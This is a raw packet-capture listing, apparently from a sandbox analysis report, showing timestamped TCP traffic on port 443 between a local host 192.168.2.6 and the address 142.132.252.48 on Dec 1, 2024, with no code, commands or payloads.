                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.350992918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.351164103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.351178885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.351321936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.374944925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.374969959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.375189066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.375189066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.375212908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.375399113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.380177021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.380197048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.380285978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.380295038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.380417109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.385826111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.385844946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.385926008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.385936975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.386032104 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.391207933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.391227007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.391330004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.391350985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.391479969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.396225929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.396245003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.396358013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.396367073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.396522999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.446080923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.541304111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.541327000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.541460037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.541467905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.541515112 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.546921968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.546938896 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.547005892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.547012091 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.547107935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.552448988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.552468061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.552556992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.552562952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.552613974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.576328039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.576348066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.576476097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.576488972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.576556921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.577003002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.581399918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.581415892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.581573009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.581581116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.581626892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.588231087 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.588248014 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.588329077 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.588335991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.588417053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.592672110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.592688084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.592784882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.592798948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.592844009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.597664118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.597681046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.597775936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.597781897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.597841978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.669209003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.742666960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.742700100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.742789984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.742796898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.742870092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.748415947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.748436928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.748512030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.748518944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.748656988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.753650904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.753669024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.753751040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.753765106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.753839970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.754256964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.777642012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.777663946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.777800083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.777800083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.777807951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.777854919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.783442974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.783462048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.783571959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.783577919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.783708096 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.788356066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.788374901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.788469076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.788475037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.788522005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.793998003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.794017076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.794094086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.794099092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.794132948 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.794173002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.794434071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.799834013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.799865007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.799942017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.799942017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.799949884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.799992085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.829298973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.943965912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.943985939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.944147110 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.944155931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.944273949 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.949525118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.949542046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.949657917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.949667931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.949714899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.954863071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.954885960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.954936981 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.954947948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.954972982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.954988003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.979130983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.979150057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.979285955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.979294062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.979341984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.984757900 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.984775066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.984898090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.984905958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.984951973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.989816904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.989833117 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.989916086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.989923000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.989969015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.989969015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.995362043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.995378971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.995462894 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.995470047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:10.995523930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.001050949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.001066923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.001152992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.001158953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.001211882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.145720005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.145740032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.145893097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.145903111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.145960093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.150727034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.150743961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.150895119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.150904894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.150995016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.156291008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.156307936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.156384945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.156393051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.156440020 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.180646896 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.180701017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.180767059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.180772066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.180800915 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.180844069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.185625076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.185642004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.185739994 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.185745955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.185864925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.191220999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.191240072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.191328049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.191328049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.191334963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.191489935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.196943998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.196964025 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.197025061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.197030067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.197104931 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.202029943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.202095032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.202126980 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.202131987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.202159882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.202172995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.239825964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.346812963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.346833944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.346937895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.346951962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.347007036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.352345943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.352365017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.352464914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.352473974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.352551937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.357853889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.357875109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.357961893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.357969046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.358016014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.382059097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.382085085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.382211924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.382219076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.382308006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.386955976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.386976957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.387090921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.387098074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.387157917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.392647028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.392664909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.392730951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.392738104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.392779112 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.392810106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.395651102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.398299932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.398319006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.398442984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.398449898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.398504972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.403213024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.403235912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.403287888 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.403292894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.403384924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.404491901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.548059940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.548088074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.548182011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.548207045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.548264980 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.553802967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.553822994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.553896904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.553927898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.553989887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.558883905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.558912039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.558958054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.558969021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.559001923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.559072018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.585170031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.585203886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.585256100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.585279942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.585335970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.585335970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.590869904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:11.590897083 CET44349721142.132.252.48192.168.2.6
